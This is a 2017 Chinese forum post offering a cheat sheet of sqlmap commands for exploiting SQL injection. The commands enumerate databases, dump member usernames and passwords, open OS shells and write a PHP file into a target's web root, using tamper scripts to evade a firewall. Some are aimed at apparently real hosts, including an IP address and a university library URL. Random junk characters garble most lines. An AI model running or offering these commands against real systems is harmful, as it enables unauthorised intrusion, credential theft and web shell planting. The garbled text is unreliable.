找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1818|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap
* E7 r! x& Z5 j% T9 c) |0 Y5 l& C" |9 k  o) M" ~$ o! u& u, k
update :::::>     in the folder   after  execute    following   order : svn update, n1 W  Q$ U" x: j) }
$ o( m( G# @9 R; R; {) c5 R% U
sqlmap.py -r 1.txt --current-db
  a( U: r8 c8 ^& f* v
' v' a* H, G. m0 v3 h1 D7 Ov 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”, e* B" P$ p1 D
7 y3 y0 W  T5 j; C
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) 3 j, r* b6 q2 ^! Q. G/ M3 _3 Z
猜解数据库; a2 \' p3 @3 Y2 N" P/ B
./sqlmap.py -u "injection-url" --dbs% v3 r* H8 D% w& B& t4 c
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
3 e$ ]5 f9 B5 z. u7 k$ u/ H, O5 e$ [3 l* F# C
猜解表名
" I# N$ s8 j5 |2 k9 I9 U& S./sqlmap.py -u "injection-url" -D database_name --tables9 Y0 ?! r# Q9 Z/ A
5 U) g$ C3 k$ b; G
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
0 V$ B5 u8 h) B' D- S: Xsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
* U( |8 n; N) k( p  ^5 M
, j) W4 _9 U  z) M' N) esqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
& i5 A1 f/ q9 R2 q
$ i+ {1 Z1 m+ S" ^4 c2 Wsqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"$ Y/ c7 ?* t, a7 t. j) @
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
% P8 \6 W+ s( y# ysqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
$ l$ p0 s* n0 z( l6 ~2 b. _sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
) ?3 M! j5 A6 e4 S' }/ i1 i! T% M1 g) k5 T. c
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"- {+ B9 T) ~. z% V) i
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"" k+ k5 W. V: u. ^" i  u
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py": @& S  \/ j2 B3 s5 o; P
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"* O/ z/ U6 ~/ y* a/ |7 g/ x
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump) y4 d$ N' J2 J* e4 P
" L7 [' g- z6 `' p+ f, Q% _. G* N$ l$ U
sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
, Y* f* K7 [: q  p. p% m, Dsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"* y" e; }1 e2 G5 F( R
4 Q$ b8 \: ]0 n+ \' B' [, e
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"6 u- a, Q5 o9 t( Y3 l# f4 V
猜解列名0 G5 O. O" ~7 p8 t9 e5 _
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns) |6 t1 t! }* b: T8 V

: Z* h, u6 u& S) ssqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
. d1 _0 K+ y$ l2 }7 ^sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
" R6 ]7 \& W% m1 y: p8 |' Nsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
) r1 ^2 O: S) t- Y# ?$ D" W: Z9 P2 w9 J1 h  K1 u  q: V: K
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
9 T7 ]1 Q3 L" ^& e) {- O&submit=Go
7 ~/ ]! @, d5 v1 C6 E猜解值4 C7 v; K1 M- l2 U9 F$ v  c
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
4 U. J( V4 R% w$ @========================================================3 g3 M4 j' {0 B7 U) R) g( N
搜索表名中包括mana字符的) h, e! f& _) U) A; D4 q3 z
/sqlmap.py -u "injection-url" -T mana --search
! V; ^7 e3 h, F* b9 k) z9 k8 C返回一个交互式sql shell
) z3 P- o# B; S3 k$ M) e/sqlmap.py -u "injection-url" --sql-shell. L6 T. }8 }* o, x
读取指定文件(需权限). x# ~; G/ o3 m2 z( X
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
: e) y7 A) u" d  t& w4 H& y4 ?: g查看当前 用户 及 数据库 6 l; P. I5 n6 ~! V# \
/sqlmap.py -u "injection-url" --current-user --current-db( J  p& \$ B# M0 x
本地文件 写入 远程目标绝对路径
" I6 e9 M. Z4 q& M1 w; I* c& F& Z8 s3 J/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径/ ~& @( `; I& w$ i  a
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" 4 F, N8 G1 j* V  p5 W7 A
0 r' |4 X, O# R7 n5 g6 \3 l) K2 k
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
/ Y) e* y. Y# |* _! i5 m* q  o$ _查看某用的权限& X) N. v7 L9 T- i% x
/sqlmap.py -u "injection-url" --privileges -U root
0 m" i, G% }- g( W6 q& s查看当前用户是否为dba
6 O0 z2 [" w4 x5 f0 z! Z/sqlmap.py -u "injection-url" --is-dba
+ [$ U  ~! y/ `5 o( ?" W! e: a$ j- J读取所有数据库用户或指定数据库用户的密码# m! L, e% z' M' W
sqlmap.py -r 1.txt --users --passwords
. q" }, w" m6 ~% F9 C* H; esqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
# U/ p, w( Q4 a* {$ D/ U1 }
4 m8 F8 n0 C& O4 P* k8 Y7 v/sqlmap.py -u "injection-url" --passwords -U root
) `& ^# f  d5 z$ e$ n# o" q: e3 c9 J9 T- W
--start&&--stop 与 --first&&--last 的区别
2 H5 V' m$ w1 f& N7 y: ?/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
" m8 b) ]! E! b
, e+ K" k3 L/ m% Z; M0 y从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
5 V  q  d, o  I/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables5 j( U' F2 L/ j7 [1 G0 Y
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns) A7 L7 z; g: k

# e$ v7 M. e9 Z: K/ F: I' M/ r执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)2 m" b7 }& e+ x
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"3 \  [/ E5 d$ g. ?( E6 }$ k% ]
6 v% ^7 Q" V9 P: Q8 l/ ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表